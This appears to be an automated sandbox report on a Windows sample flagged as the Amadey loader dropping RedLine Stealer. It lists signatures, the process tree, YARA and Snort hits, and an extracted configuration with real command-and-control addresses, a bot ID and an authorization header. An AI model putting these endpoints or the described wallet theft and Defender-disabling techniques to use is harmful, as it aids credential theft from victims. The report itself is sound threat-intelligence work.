Windows Analysis Report
file.exe

Overview

General Information

Sample Name: file.exe
Analysis ID: 803862
MD5: f83ef0c72937a6c833bfe8d3511317e5
SHA1: 5312837ca61166d8ad2998cc6d3a2b594165dec8
SHA256: ffdff2d87d032d30d6c3e794b6bc7b033d0cdf97a69ff32a563279e2844d3e13
Tags: exe
Infos:

Detection

Amadey, RedLine
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Yara detected RedLine Stealer
Yara detected Amadey's stealer DLL
Multi AV Scanner detection for submitted file
Malicious sample detected (through community Yara rule)
Antivirus / Scanner detection for submitted sample
Antivirus detection for dropped file
Multi AV Scanner detection for dropped file
Snort IDS alert for network traffic
Disable Windows Defender real time protection (registry)
Tries to steal Crypto Currency Wallets
.NET source code references suspicious native API functions
Machine Learning detection for sample
Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines)
Queries sensitive disk information (via WMI, Win32_DiskDrive, often done to detect virtual machines)
Machine Learning detection for dropped file
C2 URLs / IPs found in malware configuration
Found many strings related to Crypto-Wallets (likely being stolen)
Disable Windows Defender notifications (registry)
Tries to harvest and steal browser information (history, passwords, etc)
Uses 32bit PE files
Queries the volume information (name, serial number etc) of a device
Yara signature match
May sleep (evasive loops) to hinder dynamic analysis
Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)
Contains functionality to shutdown / reboot the system
Uses code obfuscation techniques (call, push, ret)
PE file contains sections with non-standard names
Internet Provider seen in connection with other malware
Detected potential crypto function
Yara detected Credential Stealer
Contains functionality to dynamically determine API calls
Found dropped PE file which has not been started or loaded
PE file contains executable resources (Code or Archives)
IP address seen in connection with other malware
Contains long sleeps (>= 3 min)
Enables debug privileges
Is looking for software installed on the system
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
AV process strings found (often used to terminate AV products)
Sample file is different than original file name gathered from version info
Drops PE files
Tries to load missing DLLs
Found evasive API chain checking for process token information
Detected TCP or UDP traffic on non-standard ports
Binary contains a suspicious time stamp
Queries sensitive processor information (via WMI, Win32_Processor, often done to detect virtual machines)
Dropped file seen in connection with other malware
Uses Microsoft's Enhanced Cryptographic Provider

Classification

  • System is w10x64
  • file.exe (PID: 1972 cmdline: C:\Users\user\Desktop\file.exe MD5: F83EF0C72937A6C833BFE8D3511317E5)
    • fxV11fe.exe (PID: 4652 cmdline: C:\Users\user\AppData\Local\Temp\IXP000.TMP\fxV11fe.exe MD5: AC6FB170803555E15DA3A1BA13CBC6D3)
      • faC80kI.exe (PID: 5324 cmdline: C:\Users\user\AppData\Local\Temp\IXP001.TMP\faC80kI.exe MD5: AFC0E8E01E2B88123841047710836075)
        • atn32.exe (PID: 5020 cmdline: C:\Users\user\AppData\Local\Temp\IXP002.TMP\atn32.exe MD5: 7E93BACBBC33E6652E147E7FE07572A0)
        • bvr38xq.exe (PID: 1240 cmdline: C:\Users\user\AppData\Local\Temp\IXP002.TMP\bvr38xq.exe MD5: EF8079CF160510D0DA7162BC08F753D8)
  • rundll32.exe (PID: 5568 cmdline: C:\Windows\system32\rundll32.exe" C:\Windows\system32\advpack.dll,DelNodeRunDLL32 "C:\Users\user\AppData\Local\Temp\IXP000.TMP\ MD5: 73C519F050C20580F8A62C849D49215A)
  • rundll32.exe (PID: 1888 cmdline: C:\Windows\system32\rundll32.exe" C:\Windows\system32\advpack.dll,DelNodeRunDLL32 "C:\Users\user\AppData\Local\Temp\IXP001.TMP\ MD5: 73C519F050C20580F8A62C849D49215A)
  • rundll32.exe (PID: 5944 cmdline: C:\Windows\system32\rundll32.exe" C:\Windows\system32\advpack.dll,DelNodeRunDLL32 "C:\Users\user\AppData\Local\Temp\IXP002.TMP\ MD5: 73C519F050C20580F8A62C849D49215A)
  • cleanup
{"C2 url": "62.204.41.4/Gol478Ns/index.php", "Version": "3.66"}
{"C2 url": "193.233.20.11:4131", "Bot Id": "dubna", "Authorization Header": "f324b1269094b7462e56bab025f032f4"}
Source | Rule | Description | Author | Strings
dump.pcap | JoeSecurity_RedLine | Yara detected RedLine Stealer | Joe Security
dump.pcap | JoeSecurity_RedLine_1 | Yara detected RedLine Stealer | Joe Security

Source | Rule | Description | Author | Strings
C:\Users\user\AppData\Local\Temp\IXP002.TMP\bvr38xq.exe | JoeSecurity_RedLine | Yara detected RedLine Stealer | Joe Security
C:\Users\user\AppData\Local\Temp\IXP002.TMP\bvr38xq.exe | MALWARE_Win_RedLine | Detects RedLine infostealer | ditekSHen
  • 0x1a440:$pat14: , CommandLine:
  • 0x134a1:$v2_1: ListOfProcesses
  • 0x13280:$v4_3: base64str
  • 0x13df9:$v4_4: stringKey
  • 0x11b63:$v4_5: BytesToStringConverted
  • 0x10d76:$v4_6: FromBase64
  • 0x12098:$v4_8: procName
  • 0x12813:$v5_5: FileScanning
  • 0x11d6c:$v5_7: RecordHeaderField
  • 0x11a34:$v5_9: BCRYPT_KEY_LENGTHS_STRUCT
C:\Users\user\AppData\Local\Temp\IXP000.TMP\doa18JW.exe | JoeSecurity_Amadey_2 | Yara detected Amadey's stealer DLL | Joe Security

Source | Rule | Description | Author | Strings
00000002.00000003.306466167.000000000442E000.00000004.00000020.00020000.00000000.sdmp | JoeSecurity_RedLine | Yara detected RedLine Stealer | Joe Security
00000004.00000002.398193743.000000000319F000.00000004.00000800.00020000.00000000.sdmp | JoeSecurity_RedLine | Yara detected RedLine Stealer | Joe Security
00000004.00000002.398193743.000000000319F000.00000004.00000800.00020000.00000000.sdmp | JoeSecurity_CredentialStealer | Yara detected Credential Stealer | Joe Security
00000000.00000003.305059839.00000000050CA000.00000004.00000020.00020000.00000000.sdmp | JoeSecurity_Amadey_2 | Yara detected Amadey's stealer DLL | Joe Security
00000004.00000000.331124097.0000000000D72000.00000002.00000001.01000000.00000009.sdmp | JoeSecurity_RedLine | Yara detected RedLine Stealer | Joe Security

Source | Rule | Description | Author | Strings
4.0.bvr38xq.exe.d70000.0.unpack | JoeSecurity_RedLine | Yara detected RedLine Stealer | Joe Security
4.0.bvr38xq.exe.d70000.0.unpack | MALWARE_Win_RedLine | Detects RedLine infostealer | ditekSHen
  • 0x1a440:$pat14: , CommandLine:
  • 0x134a1:$v2_1: ListOfProcesses
  • 0x13280:$v4_3: base64str
  • 0x13df9:$v4_4: stringKey
  • 0x11b63:$v4_5: BytesToStringConverted
  • 0x10d76:$v4_6: FromBase64
  • 0x12098:$v4_8: procName
  • 0x12813:$v5_5: FileScanning
  • 0x11d6c:$v5_7: RecordHeaderField
  • 0x11a34:$v5_9: BCRYPT_KEY_LENGTHS_STRUCT
2.3.faC80kI.exe.4430c20.0.raw.unpack | JoeSecurity_RedLine | Yara detected RedLine Stealer | Joe Security
2.3.faC80kI.exe.4430c20.0.raw.unpack | MALWARE_Win_RedLine | Detects RedLine infostealer | ditekSHen
  • 0x1a440:$pat14: , CommandLine:
  • 0x134a1:$v2_1: ListOfProcesses
  • 0x13280:$v4_3: base64str
  • 0x13df9:$v4_4: stringKey
  • 0x11b63:$v4_5: BytesToStringConverted
  • 0x10d76:$v4_6: FromBase64
  • 0x12098:$v4_8: procName
  • 0x12813:$v5_5: FileScanning
  • 0x11d6c:$v5_7: RecordHeaderField
  • 0x11a34:$v5_9: BCRYPT_KEY_LENGTHS_STRUCT
2.3.faC80kI.exe.4430c20.0.unpack | JoeSecurity_RedLine | Yara detected RedLine Stealer | Joe Security

No Sigma rule has matched

Timestamp: 02/10/23-11:38:31.544987
SID: 2043234
Source IP: 193.233.20.11
Source Port: 4131
Destination IP: 192.168.2.4
Destination Port: 49696
Protocol: TCP
Classtype: A Network Trojan was detected

Timestamp: 02/10/23-11:38:44.271780
SID: 2043231
Source IP: 192.168.2.4
Source Port: 49696
Destination IP: 193.233.20.11
Destination Port: 4131
Protocol: TCP
Classtype: A Network Trojan was detected

Timestamp: 02/10/23-11:38:29.869058
SID: 2043233
Source IP: 192.168.2.4
Source Port: 49696
Destination IP: 193.233.20.11
Destination Port: 4131
Protocol: TCP
Classtype: A Network Trojan was detected

AV Detection

Source: file.exe | ReversingLabs: Detection: 69%
Source: file.exe | Virustotal: Detection: 59%
Source: file.exe | Avira: detected
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\fxV11fe.exe | Avira: detection malicious, Label: HEUR/AGEN.1252166
Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\faC80kI.exe | Avira: detection malicious, Label: HEUR/AGEN.1252166
Source: C:\Users\user\AppData\Local\Temp\IXP002.TMP\bvr38xq.exe | Avira: detection malicious, Label: HEUR/AGEN.1252166
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\doa18JW.exe | ReversingLabs: Detection: 79%
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\doa18JW.exe | Virustotal: Detection: 81%
Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\cEB8028.exe | Virustotal: Detection: 32%
Source: C:\Users\user\AppData\Local\Temp\IXP002.TMP\atn32.exe | ReversingLabs: Detection: 84%
Source: C:\Users\user\AppData\Local\Temp\IXP002.TMP\bvr38xq.exe | ReversingLabs: Detection: 96%
Source: file.exe | Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\doa18JW.exe | Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\fxV11fe.exe | Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\faC80kI.exe | Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\Temp\IXP002.TMP\bvr38xq.exe | Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\Temp\IXP002.TMP\atn32.exe | Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\cEB8028.exe | Joe Sandbox ML: detected
Source: 00000002.00000003.306466167.000000000442E000.00000004.00000020.00020000.00000000.sdmp | Malware Configuration Extractor: RedLine {"C2 url": "193.233.20.11:4131", "Bot Id": "dubna", "Authorization Header": "f324b1269094b7462e56bab025f032f4"}
Source: 0.3.file.exe.515f220.0.raw.unpack | Malware Configuration Extractor: Amadey {"C2 url": "62.204.41.4/Gol478Ns/index.php", "Version": "3.66"}
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_008D2F1D GetSystemDirectoryA,LoadLibraryA,GetProcAddress,DecryptFileA,FreeLibrary,SetCurrentDirectoryA,0_2_008D2F1D
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\fxV11fe.exe | Code function: 1_2_00A02F1D GetSystemDirectoryA,LoadLibraryA,GetProcAddress,DecryptFileA,FreeLibrary,SetCurrentDirectoryA,1_2_00A02F1D
Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\faC80kI.exe | Code function: 2_2_00A92F1D GetSystemDirectoryA,LoadLibraryA,GetProcAddress,DecryptFileA,FreeLibrary,SetCurrentDirectoryA,2_2_00A92F1D
Source: file.exe | Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
Source: file.exe | Static PE information: DYNAMIC_BASE, NX_COMPAT, GUARD_CF, TERMINAL_SERVER_AWARE
Source: Binary string: wextract.pdb source: file.exe, fxV11fe.exe.0.dr, faC80kI.exe.1.dr
Source: Binary string: D:\Mktmp\Amadey\Release\Amadey.pdb source: file.exe, 00000000.00000003.305059839.00000000050CA000.00000004.00000020.00020000.00000000.sdmp, doa18JW.exe.0.dr
Source: Binary string: wextract.pdbGCTL source: file.exe, fxV11fe.exe.0.dr, faC80kI.exe.1.dr
Source: Binary string: C:\Users\Admin\source\repos\Healer\Healer\obj\Release\Healer.pdb source: faC80kI.exe, 00000002.00000003.306466167.000000000442E000.00000004.00000020.00020000.00000000.sdmp, atn32.exe, 00000003.00000000.306843047.0000000000232000.00000002.00000001.01000000.00000006.sdmp, atn32.exe.2.dr
Source: Binary string: .;C:\xotelogiwax.pdb source: fxV11fe.exe, 00000001.00000003.305814523.00000000050BF000.00000004.00000020.00020000.00000000.sdmp, cEB8028.exe.1.dr
Source: Binary string: C:\xotelogiwax.pdb source: fxV11fe.exe, 00000001.00000003.305814523.00000000050BF000.00000004.00000020.00020000.00000000.sdmp, cEB8028.exe.1.dr
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_008D2390 FindFirstFileA,lstrcmpA,lstrcmpA,SetFileAttributesA,DeleteFileA,FindNextFileA,FindClose,RemoveDirectoryA,0_2_008D2390
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\fxV11fe.exe | Code function: 1_2_00A02390 FindFirstFileA,lstrcmpA,lstrcmpA,SetFileAttributesA,DeleteFileA,FindNextFileA,FindClose,RemoveDirectoryA,1_2_00A02390
Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\faC80kI.exe | Code function: 2_2_00A92390 FindFirstFileA,lstrcmpA,lstrcmpA,SetFileAttributesA,DeleteFileA,FindNextFileA,FindClose,RemoveDirectoryA,2_2_00A92390

Networking

Source: Traffic | Snort IDS: 2043233 ET TROJAN RedLine Stealer TCP CnC net.tcp Init 192.168.2.4:49696 -> 193.233.20.11:4131
Source: Traffic | Snort IDS: 2043231 ET TROJAN Redline Stealer TCP CnC Activity 192.168.2.4:49696 -> 193.233.20.11:4131
Source: Traffic | Snort IDS: 2043234 ET MALWARE Redline Stealer TCP CnC - Id1Response 193.233.20.11:4131 -> 192.168.2.4:49696
Source: Malware configuration extractor | URLs: 62.204.41.4/Gol478Ns/index.php
Source: Malware configuration extractor | URLs: 193.233.20.11:4131
Source: Joe Sandbox View | ASN Name: REDCOM-ASRedcomKhabarovskRussiaRU
Source: Joe Sandbox View | IP Address: 193.233.20.11
Source: global traffic | TCP traffic: 192.168.2.4:49696 -> 193.233.20.11:4131
Source: unknown | TCP traffic detected without corresponding DNS query: 193.233.20.11
                          Source: bvr38xq.exe, 00000004.00000002.398193743.0000000003111000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/rm/LastMessage
                          Source: bvr38xq.exe, 00000004.00000002.398193743.0000000003111000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/rm/SequenceAcknowledgement
                          Source: bvr38xq.exe, 00000004.00000002.398193743.0000000003111000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/rm/TerminateSequence
                          Source: bvr38xq.exe, 00000004.00000002.398193743.000000000319F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/sc
                          Source: bvr38xq.exe, 00000004.00000002.398193743.000000000319F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/sc/dk
                          Source: bvr38xq.exe, 00000004.00000002.398193743.000000000319F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/sc/dk/p_sha1
                          Source: bvr38xq.exe, 00000004.00000002.398193743.000000000319F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/sc/sct
                          Source: bvr38xq.exe, 00000004.00000002.398193743.000000000319F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/trust
                          Source: bvr38xq.exe, 00000004.00000002.398193743.000000000319F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/trust#BinarySecret
                          Source: bvr38xq.exe, 00000004.00000002.398193743.000000000319F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/trust/CK/PSHA1
                          Source: bvr38xq.exe, 00000004.00000002.398193743.000000000319F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/trust/Cancel
                          Source: bvr38xq.exe, 00000004.00000002.398193743.000000000319F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/trust/Issue
                          Source: bvr38xq.exe, 00000004.00000002.398193743.000000000319F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/trust/Nonce
                          Source: bvr38xq.exe, 00000004.00000002.398193743.000000000319F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/trust/PublicKey
                          Source: bvr38xq.exe, 00000004.00000002.398193743.000000000319F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/trust/RST/Issue
                          Source: bvr38xq.exe, 00000004.00000002.398193743.000000000319F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/trust/RST/SCT
                          Source: bvr38xq.exe, 00000004.00000002.398193743.000000000319F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/trust/RST/SCT/Cancel
                          Source: bvr38xq.exe, 00000004.00000002.398193743.000000000319F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/trust/RST/SCT/Renew
                          Source: bvr38xq.exe, 00000004.00000002.398193743.000000000319F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/trust/RSTR/Issue
                          Source: bvr38xq.exe, 00000004.00000002.398193743.000000000319F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/trust/RSTR/SCT
                          Source: bvr38xq.exe, 00000004.00000002.398193743.000000000319F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/trust/RSTR/SCT/Cancel
                          Source: bvr38xq.exe, 00000004.00000002.398193743.000000000319F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/trust/RSTR/SCT/Renew
                          Source: bvr38xq.exe, 00000004.00000002.398193743.000000000319F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/trust/Renew
                          Source: bvr38xq.exe, 00000004.00000002.398193743.000000000319F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/trust/SymmetricKey
                          Source: bvr38xq.exe, 00000004.00000002.398193743.000000000319F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/trust/spnego
                          Source: bvr38xq.exe, 00000004.00000002.398193743.000000000319F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/trust/tlsnego
                          Source: bvr38xq.exe, 00000004.00000002.398193743.0000000003111000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/dns
                          Source: bvr38xq.exe, 00000004.00000002.398193743.000000000319F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
                          Source: bvr38xq.exe, 00000004.00000002.398193743.0000000003111000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/right/possessproperty
                          Source: bvr38xq.exe, 00000004.00000002.398193743.000000000319F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2006/02/addressingidentity
                          Source: bvr38xq.exe, 00000004.00000002.398193743.000000000319F000.00000004.00000800.00020000.00000000.sdmp, bvr38xq.exe, 00000004.00000002.398193743.0000000003111000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/
                          Source: bvr38xq.exe, 00000004.00000002.398193743.0000000003111000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id1
                          Source: bvr38xq.exe, 00000004.00000002.398193743.0000000003111000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id10
                          Source: bvr38xq.exe, 00000004.00000002.398193743.0000000003111000.00000004.00000800.00020000.00000000.sdmp, bvr38xq.exe, 00000004.00000002.398193743.0000000003466000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id10Response
                          Source: bvr38xq.exe, 00000004.00000002.398193743.0000000003111000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id11
                          Source: bvr38xq.exe, 00000004.00000002.398193743.0000000003111000.00000004.00000800.00020000.00000000.sdmp, bvr38xq.exe, 00000004.00000002.398193743.0000000003466000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id11Response
                          Source: bvr38xq.exe, 00000004.00000002.398193743.0000000003111000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id12
                          Source: bvr38xq.exe, 00000004.00000002.398193743.0000000003111000.00000004.00000800.00020000.00000000.sdmp, bvr38xq.exe, 00000004.00000002.398193743.0000000003466000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id12Response
                          Source: bvr38xq.exe, 00000004.00000002.398193743.000000000319F000.00000004.00000800.00020000.00000000.sdmp, bvr38xq.exe, 00000004.00000002.398193743.0000000003111000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id13
                          Source: bvr38xq.exe, 00000004.00000002.398193743.0000000003111000.00000004.00000800.00020000.00000000.sdmp, bvr38xq.exe, 00000004.00000002.398193743.0000000003466000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id13Response
                          Source: bvr38xq.exe, 00000004.00000002.398193743.0000000003111000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id14
                          Source: bvr38xq.exe, 00000004.00000002.398193743.0000000003111000.00000004.00000800.00020000.00000000.sdmp, bvr38xq.exe, 00000004.00000002.398193743.0000000003466000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id14Response
                          Source: bvr38xq.exe, 00000004.00000002.398193743.0000000003111000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id15
                          Source: bvr38xq.exe, 00000004.00000002.398193743.000000000319F000.00000004.00000800.00020000.00000000.sdmp, bvr38xq.exe, 00000004.00000002.398193743.0000000003111000.00000004.00000800.00020000.00000000.sdmp, bvr38xq.exe, 00000004.00000002.398193743.000000000355E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id15Response
                          Source: bvr38xq.exe, 00000004.00000002.398193743.0000000003111000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id16
                          Source: bvr38xq.exe, 00000004.00000002.398193743.0000000003111000.00000004.00000800.00020000.00000000.sdmp, bvr38xq.exe, 00000004.00000002.398193743.0000000003466000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id16Response
                          Source: bvr38xq.exe, 00000004.00000002.398193743.0000000003111000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id17
                          Source: bvr38xq.exe, 00000004.00000002.398193743.0000000003111000.00000004.00000800.00020000.00000000.sdmp, bvr38xq.exe, 00000004.00000002.398193743.0000000003466000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id17Response
                          Source: bvr38xq.exe, 00000004.00000002.398193743.0000000003111000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id18
                          Source: bvr38xq.exe, 00000004.00000002.398193743.0000000003111000.00000004.00000800.00020000.00000000.sdmp, bvr38xq.exe, 00000004.00000002.398193743.0000000003466000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id18Response
                          Source: bvr38xq.exe, 00000004.00000002.398193743.0000000003111000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id19
                          Source: bvr38xq.exe, 00000004.00000002.398193743.0000000003111000.00000004.00000800.00020000.00000000.sdmp, bvr38xq.exe, 00000004.00000002.398193743.0000000003466000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id19Response
                          Source: bvr38xq.exe, 00000004.00000002.398193743.000000000319F000.00000004.00000800.00020000.00000000.sdmp, bvr38xq.exe, 00000004.00000002.398193743.0000000003111000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id1Response
                          Source: bvr38xq.exe, 00000004.00000002.398193743.0000000003111000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id2
                          Source: bvr38xq.exe, 00000004.00000002.398193743.0000000003111000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id20
                          Source: bvr38xq.exe, 00000004.00000002.398193743.0000000003111000.00000004.00000800.00020000.00000000.sdmp, bvr38xq.exe, 00000004.00000002.398193743.0000000003466000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id20Response
                          Source: bvr38xq.exe, 00000004.00000002.398193743.0000000003111000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id21
                          Source: bvr38xq.exe, 00000004.00000002.398193743.000000000355E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id21Response
                          Source: bvr38xq.exe, 00000004.00000002.398193743.0000000003111000.00000004.00000800.00020000.00000000.sdmp, bvr38xq.exe, 00000004.00000002.398193743.0000000003466000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id22
                          Source: bvr38xq.exe, 00000004.00000002.398193743.000000000319F000.00000004.00000800.00020000.00000000.sdmp, bvr38xq.exe, 00000004.00000002.398193743.0000000003111000.00000004.00000800.00020000.00000000.sdmp, bvr38xq.exe, 00000004.00000002.398193743.000000000355E000.00000004.00000800.00020000.00000000.sdmp, bvr38xq.exe, 00000004.00000002.398193743.0000000003466000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id22Response
                          Source: bvr38xq.exe, 00000004.00000002.398193743.000000000319F000.00000004.00000800.00020000.00000000.sdmp, bvr38xq.exe, 00000004.00000002.398193743.0000000003111000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id2Response
                          Source: bvr38xq.exe, 00000004.00000002.398193743.0000000003111000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id3
                          Source: bvr38xq.exe, 00000004.00000002.398193743.0000000003111000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id3Response
                          Source: bvr38xq.exe, 00000004.00000002.398193743.0000000003111000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id4
                          Source: bvr38xq.exe, 00000004.00000002.398193743.000000000319F000.00000004.00000800.00020000.00000000.sdmp, bvr38xq.exe, 00000004.00000002.398193743.0000000003111000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id4Response
                          Source: bvr38xq.exe, 00000004.00000002.398193743.0000000003111000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id5
                          Source: bvr38xq.exe, 00000004.00000002.398193743.0000000003111000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id5Response
                          Source: bvr38xq.exe, 00000004.00000002.398193743.0000000003111000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id6
                          Source: bvr38xq.exe, 00000004.00000002.398193743.0000000003111000.00000004.00000800.00020000.00000000.sdmp, bvr38xq.exe, 00000004.00000002.398193743.0000000003466000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id6Response
                          Source: bvr38xq.exe, 00000004.00000002.398193743.0000000003111000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id7
                          Source: bvr38xq.exe, 00000004.00000002.398193743.0000000003111000.00000004.00000800.00020000.00000000.sdmp, bvr38xq.exe, 00000004.00000002.398193743.0000000003466000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id7Response
                          Source: bvr38xq.exe, 00000004.00000002.398193743.0000000003111000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id8
                          Source: bvr38xq.exe, 00000004.00000002.398193743.0000000003111000.00000004.00000800.00020000.00000000.sdmp, bvr38xq.exe, 00000004.00000002.398193743.0000000003466000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id8Response
                          Source: bvr38xq.exe, 00000004.00000002.398193743.0000000003111000.00000004.00000800.00020000.00000000.sdmp, bvr38xq.exe, 00000004.00000002.398193743.0000000003466000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id9
                          Source: bvr38xq.exe, 00000004.00000002.398193743.000000000319F000.00000004.00000800.00020000.00000000.sdmp, bvr38xq.exe, 00000004.00000002.398193743.0000000003111000.00000004.00000800.00020000.00000000.sdmp, bvr38xq.exe, 00000004.00000002.398193743.0000000003466000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id9Response
                          Source: bvr38xq.exe, 00000004.00000002.401601537.000000000418C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://ac.ecosia.org/autocomplete?q=
